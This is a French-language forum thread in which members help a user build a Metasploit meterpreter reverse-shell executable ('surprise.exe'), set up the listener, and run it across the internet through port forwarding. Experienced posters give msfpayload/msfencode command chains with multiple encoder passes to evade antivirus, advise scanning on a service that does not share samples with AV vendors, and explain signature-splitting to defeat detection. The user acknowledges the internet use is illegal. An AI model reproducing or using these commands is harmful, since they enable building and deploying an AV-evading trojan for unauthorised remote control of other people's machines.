Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 18-01-2011 21:04:23

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

msfpayload

Nous y voila (je me disais bien que ca semblait trop simple).
J'ai donc suivi les étape d'Antares pour créer un .exe.
J'ai donc crée le .exe, copier sur une clé USB, et éxécuter sur mon Windows Xp sans Antivirus.
Apres je lance la commande Exploit, ce qui affiche le résultat :
[-] Exploit failed: uninitialized constant Msf::Encoder::Type::PrintfPHPMagicQuotes
[*] Exploit completed, but no session was created.


De plus, si je fait exploit avant de lancer le .exe, j'ai un message d'erreur ;
[-] Exploit failed: wrong constant name #<Module:0xb6467f38>
[*] Exploit completed, but no session was created.

Si vous voulez, je vous listerez EXACTEMENT les étapes que j'ai fait pour en arriver la.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 18-01-2011 21:12:27

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : msfpayload

Gné ?! C'est quoi ces messages d'erreur, j'ai jamais vu ça moi ! big_smile

Bon, il va effectivement nous falloir le détail des commandes que tu as tapées pour en arriver là (tout le monde n'a pas lu l'autre topic --> Accéder à un PC du réseau), ainsi que ta version de Metasploit (c'est écrit au moment où msfconsole se lance) et l'OS sur lequel tu fais tes tests (BackTrack ? Quelle version ?)

A première vue, je dirais que c'est un bug de Metasploit et/ou de Ruby qui est derrière, mais on va confirmer ça (ou pas) calmement (ou pas)² smile

Hors Ligne

#3 18-01-2011 21:34:34

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : msfpayload

Oui c'est étrange metasploit marche ou ne marche pas mais il bug (rarement) je pense

Hors Ligne

#4 18-01-2011 21:34:38

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : msfpayload

cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=12345 X > ~/surprise.exe
#remplacer LHOST par l'IP de la machine attaquante
./msfconsole # puis dans la console tu tapes les commandes suivantes : 
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.42 #remplace par l'adresse IP de l'attaquant, donc celle de la machine Metasploit
set LPORT 12345
exploit

Puis je lance le .exe sur windows.
Et la j'ai le message d'erreur.
J'utilise Backtrack 4 en Partition.
Msf : 3.3-dev

Hors Ligne

#5 18-01-2011 21:37:55

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : msfpayload

Tentes un update de metasploit wink ou sinon installe la 3.5.1 ou encore la 3.6 smile

Hors Ligne

#6 18-01-2011 22:02:27

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : msfpayload

Metasploit n'est pas directement installé sur Backtrack ? Je le trouve pas, j'ai du le re-téléchargé.


Edit : je l'ai téléchargé et laisser dans /root/metasploit, puis j'ai refait les manip dans ce dossier, et TADAA.
Je n'ai aucune idée d'ou cela peut venir avec le /pentest/exploits/framework3

Ca ne me dérange pas de rester ainsi, mais si vous avez une idée smile

Dernière modification par necromoine (18-01-2011 22:09:10)

Hors Ligne

#7 18-01-2011 22:13:35

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : msfpayload

Tu a télécharger quel version?

Hors Ligne

#8 18-01-2011 22:17:11

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : msfpayload

3.5.1 released.
Etant donné que j'ai maintenant réussi à faire en local.
Quel est la théorie pour le faire en internet (c'est illégal je sais, nous somme deux amis a faire des tests).
Je dit théorie car il y a tres peu de chance pour que cela marche.

Est ce que metasploit est  à l'origine des pc zombies  ? Ou ce sont des logiciels encores plus puissant ?

Hors Ligne

#9 18-01-2011 22:19:35

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : msfpayload

Ton "tadaa", ça veut dire que ça marche, problème résolu ?

Sinon, comme tu l'as sans doute remarqué à la fin, metasploit est (évidemment) présent sur BackTrack, dans le dossier /pentest/exploits/framework3 (qui est un raccourci vers /opt/metasploit3/msf3). J'arrive pas trop à voir où est le problème, je n'ai pas eu la même erreur que toi avec une BT4-R2 vanilla (non modifiée). Bah, tant que ça marche...

Allez, tant qu'on y est, comment mettre metasploit à jour (c'est conseillé avant de travailler avec) sous BackTrack :
- commencer par se connecter au net (ouais, ça paraît con comme ça, mais...)
- faire la mise à jour par SVN :

svn up /pentest/exploits/framework3

Et hop, un metasploit flambant neuf (le SVN c'est ce qui se fait de plus récent, pas toujours stable mais super à jour big_smile)

Pour faire ça via le net, c'est pas beaucoup plus compliqué :
- l'un se met en attaquant : il ouvre son port 12345 (par exemple) et le redirige vers l'IP de sa machine
- l'autre se met en victime, avec le payload windows/meterpreter/reverse_tcp, l'IP publique de l'attaquant et le bon port (12345 ici), il désactive son antivirus puis il exécute le "trojan"
- l'attaquant doit récupérer une session meterpreter, bingo (s'il veut rigoler, il lance "uictl mouse disable" tongue)
Autres actions possibles --> HELP ou Metasploit/MeterpreterClient (liste non exhaustive)

Meterpreter n'est pas à l'origine des botnets, qui utilisent des logiciels "maison" pour échapper aux antivirus. En plus, Metasploit n'est pas vraiment prévu ni optimisé pour gérer des centaines/milliers de victimes : un botnet a besoin d'un bon canal de C&C (control & command), par exemple via IRC ou Twitter, ce que Metasploit ne propose pas.
Mais pour un petit trojan-maison, c'est une bonne solution (bien que de moins en moins FUD)

Hors Ligne

#10 19-01-2011 19:46:41

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : msfpayload

Il me dit que le repertoire est locked et que je doit SVN cleanup, mais quand je fait svn cleanup j'ai le message suivant  :
svn: Working copy '/pentest/exploits/framework3' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)

Hors Ligne

#11 19-01-2011 20:54:26

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : msfpayload

D'après ce post sur le forum officiel, réinstaller Metasploit règlerait le problème --> svn locked when autoupdate metasploit. .

En gros ça donne :

apt-get purge framework3 
apt-get update && apt-get install framework3

Je m'y connais pas assez en SVN pour te dire à quoi c'est dû par contre...

T'es arrivé à quelque-chose avec msf à travers Internet ?

Hors Ligne

#12 19-01-2011 21:54:03

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : msfpayload

merci, je suis en train de le réinstaller.
Sinon, pour le net, je n'ai pas eu le temps d'essayer, mais j'ai deja fait un port forwarding vers mon IP (c'est bien ca qu'il faut faire ? )
En attendant, j'essaye de modifier la signature, mais je n'ai pas compris avec quoi il fallait "couper" le fichier pour isoler les Octets, je suis en train de faire avec des archive de 2octets chacune. (perte de temps ?)

Hors Ligne

#13 19-01-2011 22:12:17

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : msfpayload

Oui, le port forwarding c'est ce qu'il faut faire pour qu ele reverse_tcp puisse revenir à ta machine d'attaque.

Pour modifier la signature, t'auras plus vite fait d'utiliser msfencode (qui propose des crypters intégrés) que la méthode manuelle.
Ta commande vient un truc du genre :

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 LPORT=12345 R | ./msfencode -t exe -o surprise.exe -e x86/shikata_ga_nai -c 5

le R indique "sort moi ça au format brut" (Raw) puis tu le rediriges vers msfencode qui va utiliser shikata_ga_nai pour maquiller le code-source. Là il fait 5 passages, tu peux en mettre plus. Shikata_ga_nai est le meilleur encodeur (je pense), même si le XOR donne de bons résultats aussi.
Plus de détails --> Msfencode a Msfpayload Into An Existing Executable (là ils utilisent les options -x et -k pour intégrer le code dans la calculatrice, ce n'est pas obligatoire)

Mais si tu veux le faire par modification binaire, ta façon de faire n'est pas la plus rapide. Il vaut mieux d'abord diviser le fichier en 2, passer les 2 moitiés à l'antivirus et voir sur laquelle il déclenche, puis diviser la moitié concernée encore en 2, etc... Ca s'appelle la dichotomie wink
Par contre, pour couper les fichiers il vaut mieux utiliser un tool comme hjsplitter ou MegaSplit que de passer par des archives, qui risquent de "masquer" le problème.

Hors Ligne

#14 20-01-2011 22:31:13

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : msfpayload

J'ai fait le test sur virus total avec les deux méthodes, j'arrive à 18/42, alors que j'étais a 25/42.
C'est deja pas mal, mais j'ai une question, si j'installe un antivirus différent sur mes deux pc, (qui sont totalment opposé grâce à virus total), et que je fait la manipulation sur chacun des ces deux antivirus, cela peut'il marcher ?

Necromoine

Hors Ligne

#15 20-01-2011 22:39:20

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : msfpayload

Je comprends pas trop la question (surtout la partie "qui sont totalement opposés grâce à virustotal"), mais une chose est sûre : il faut que le PC-cible ne détecte pas ton exécutable. Donc si tu vois qu'Avast (par exemple) ne déclanche pas sur ton exe, tu peux mettre un avast sur ta machine-victime.

Je maintiens que tu aurais de meilleurs résultats avec msfencode, j'ai fait un test cet aprem et j'arrive à 6/42 avec cette commande :

./msfpayload windows/shell/reverse_tcp LHOST=10.0.2.15 LPORT=5555 R | ./msfencode -t raw -e x86/call4_dword_xor -c 5 | ./msfencode -t exe -o surprise.exe -e x86/shikata_ga_nai -c 5

5 passes de XOR, 5 passes de Shikata_ga_nai, c'est une bonne base (note qu'ici je travaille avec un simple shell en payload, et pas un meterpreter).

Au passage, utilise plutôt novirusthanks.org que virustotal, ce dernier a tendance à "partager" ses découvertes avec les éditeurs d'antivirus... Scanner chez lui revient à envoyer ton trojan directement chez l'ennemi wink
Pense bien sûr à cocher la case "do not distribute sample" chez novirusthanks smile

Hors Ligne

#16 21-01-2011 18:19:37

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : msfpayload

Ce que je voulais dire c'est que si je prend un antivirus (avast) que je modifie la signature.
Que je scan et que sur mon second PC, j'installe un antivirus qui le détecte encore puis que je remodifie la signature.
Cela peut marcher ?
Ou il le rendra détéctable par avast (qui ne le détectait plus)
Ps: apres mon premier test en réseau :
[-] Handler failed to bind to XX.XX.XX.XX:12345
[*] Started reverse handler on 0.0.0.0:12345
[*] Starting the payload handler...
D'ou viens le probleme ? ?

Dernière modification par necromoine (21-01-2011 18:38:38)

Hors Ligne

#17 21-01-2011 18:24:59

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : msfpayload

Il faut savoir qu'un antivirus a 2 modes de fonctionnement : par signature (classique) et heuristique, c-à-d qu'il essaie de détecter une "action suspecte" même si l'exécutable ne correspond pas à une signature connue. Ce deuxième mode (l'heuristique) est très difficile (voire impossible) à contourner par modification binaire, puisque c'est le fonctionnement même du programme qui est en cause. Mais ça veut aussi dire que l'heuristique (qui reste malgré tout des statistiques appliquées) est difficile à prédire à l'avance, donc on peut difficilement dire "tel exécutable ne sera jamais détecté" hmm

Dans ton cas, tu as intérêt à modifier ton exécutable "à la main" jusqu'à avoir un minimum de détection sur novirusthanks. Comme il utilise les mêmes moteurs que les antivirus "grand public", un EXE qui n'est pas détecté par Avast selon novirusthanks ne le sera pas non plus chez ta cible (sauf mise à jour ultérieure) smile

Je ne sais si ça répond à ta question ?

Hors Ligne

#18 21-01-2011 18:42:42

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : msfpayload

Oui, mais modifier plusieurs fois la signature, avec des antivirus qui le reconnaissent ou non, cela risque de ne pas marcher ?

C'est ce que j'ai compris dans ton message.
En faite, les 18 qui restent apres l'avoir modifier à la main, sont ceux qui marche à l'heuristique.

Ps: apres mon premier test en réseau :
[-] Handler failed to bind to XX.XX.XX.XX:12345
[*] Started reverse handler on 0.0.0.0:12345
[*] Starting the payload handler...
D'ou viens le probleme ? ?

Hors Ligne

#19 21-01-2011 21:27:02

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : msfpayload

Comme je le disais, échapper à l'heuristique par la modification hexadécimale, j'te souhaite bon courage...

Pour Metasploit, jusque là, rien de très grave. Je suppose que tu as réglé le LHOST avec ton adresse publique et que tu es en NAT, c'est exact ? smile En gros, tu dis à ta machine "écoute sur l'adresse 99.124.83.37 (au hasard)", mais ce n'est pas directement cette machine qui a ton adresse. Elle n'est même pas au courant qu'elle a cette adresse, puisque toutes ses interfaces ont une IP locale (à cause du NAT). Alors il te répond "désolé, je sais pas écouter sur cette adresse, donc j'écoute sur toutes mes interfaces (0.0.0.0)". Donc en soi ce n'est pas un problème, si tu ne veux pas avoir cette erreur donne ton adresse locale en LHOST (le port forwarding s'occupera d'amener ce qu'il faut depuis internet).
Le "starting the payload handler" indique qu'il attend que la victime vienne se connecter. Une fois qu'il reçoit une connexion de la partie cliente, il lui enverra le code nécessaire pour avoir une session meterpreter sur le système-victime. Si à ce moment là ton ami double clique sur l'EXE, c'est le début des festivités wink

Hors Ligne

#20 21-01-2011 22:11:20

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : msfpayload

[c]./msfpayload windows/meterpreter/reverse_tcp LHOST=178.XX.XX.XXXX LPORT=12345 X > ~/surprise.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=178.XXX.XX.XX,LPORT=12345
[email protected]:~/metasploit# ./msfconsole

                                  _       _
             _                   | |     (_)_
____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


       =[ metasploit v3.5.1-release [core:3.5 api:1.0]
+ -- --=[ 640 exploits - 322 auxiliary
+ -- --=[ 273 payloads - 27 encoders - 8 nops
       =[ svn r11354 updated 36 days ago (2010.12.16)

Warning: This copy of the Metasploit Framework was last updated 36 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/proje … i/Updating

msf > use multi/handler
smsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.45
LHOST => 192.168.1.45
msf exploit(handler) > set LPORT 12345
LPORT => 12345
msf exploit(handler) > exploit
[/c]

Je lui envoie le .exe, mais il ne peut pas l'executer : "Windows ne parvient pas a acceder au périphérique, au chemin d'acces ou au fichier spécifier.
Vous ne disposez peut etre pas des autorisations appropriées pour avoir acces à l'élément."
On a essayer en admin, et de modifier le droit des fichiers, mais ca ne marche pas...

De plus, j'ai l'impression que mon IP a changée... alors que j'ai une ip fixe...
J'ai regardé sur votre site, et elle est passé de 88.XX.XX.XXX à 178.xxx.xx.xx
Pour moi la premiere était la bonne, car la seconde ne me semble pas etre une IP externe correcte (je me trompe peut etre).

Dernière modification par necromoine (29-01-2011 22:05:12)

Hors Ligne

#21 21-01-2011 23:22:37

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : msfpayload

Petite remarque avant de commencer : très bon réflexe de masquer l'IP dans ta commande, par contre faut penser à la masquer partout wink Elle apparaît encore à la ligne 5 et à la ligne 25...

J'ai réessayé la même commande que toi, chez moi ça marche (cible Windows XP SP3 full patched sans antivirus) et ça marche. C'est la première fois que je vois l'erreur que tu mentionnes, j'vais voir si je trouve + d"infos mais à première vue c'est son antivirus qui déclenche et qui empêche l'accès au fichier (ou son exécution), faut qu'il vérifie bien qu'il a désactivé tous ses progs de sécurité (antivirus, antispyware, antibiotique,...)

D'après les logs du forum tu n'as vraiment pas l'air d'être en IP fixe : sur 62 messages, tu en as postés depuis 31 adresses IP différentes (réutilisation maximale : 7). J'ai regardé vite fait et la majorité a l'air de correspondre au même FAI donc ca reste logique (même si je suis surpris du nombre de plages dont il dispose). Je peux t'envoyer le détail en MP si ça t'intéresse.
Donc avant de lancer une attaque, utilise toujours un site comme whatsmyip.org (ou... crack-wifi.com big_smile) pour voir ton adresse IP actuelle, ou alors tu dois utiliser un service comme dyndns et un payload metasploit qui gère le DNS aussi wink

[EDIT]
Le port forwarding a l'air bon (en supposant que le device "necromoine" correspond bien à ta machine d'attaque), tu peux vérifier qu'il fonctionne avec ncat :
- dans une première console tu lances

ncat -l -p 12345

- dans une seconde console tu lances

ncat IP_EXTERNE 12345

et tu dois pouvoir t'chatter entre les 2 consoles, ce que tu tapes d'un côté doit apparaître de l'autre smile

Hors Ligne

#22 22-01-2011 00:01:07

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : msfpayload

Salut,

Peut-etre qu'il faut essayer de donner des droits à ton payload,

Code:

./msfpayload windows/meterpreter/reverse_tcp LHOST=178.XX.XX.XXXX LPORT=12345 X > ~/surprise.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=178.XXX.XX.XX,LPORT=12345

chmod +x  ~/surprise.exe

Dernière modification par Fuji (22-01-2011 00:08:24)

Hors Ligne

#23 22-01-2011 12:16:53

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : msfpayload

merci, je vais essayer de le passe en chmod +x,
Antares, j'ai ces message d'erreur :

Pour le premiere :
Ncat: -l and -p are incompatible.  Specify the address and port to bind to like you would a host to connect to. QUITTING.

Hors Ligne

#24 23-01-2011 03:23:09

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : msfpayload

Pour le premiere :
Ncat: -l and -p are incompatible.  Specify the address and port to bind to like you would a host to connect to. QUITTING

Bizarre cette erreur, peut-être qu’il y a déjà un programme qui écoute sur le port 12345 ? je pense au gestionnaire metasploit. Sinon si tu tapes tout simplement comme il t'a indiqué plus haut Antares, Netcat se met automatiquement en écoute.

Dernière modification par Fuji (23-01-2011 03:32:31)

Hors Ligne

#25 23-01-2011 11:47:16

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : msfpayload

J'ai essayé ces commandes :
[email protected]:~# ncat 178.2.xx.xx.Xx  12345
[email protected]:~# ncat 178..xx.xx.Xx -p   12345
Mais celle ci se lancent et puis s'arretent au bout de quelques secondes.
Dans l'autre par contre, j'ai tapé
ncat -l  12345
Et la sa semble marcher...

D'ou pourrait venir le probleme  ?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
probleme avec msfpayload par voxpopuli
10 2434 22-12-2011 13:57:21 par voxpopuli

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]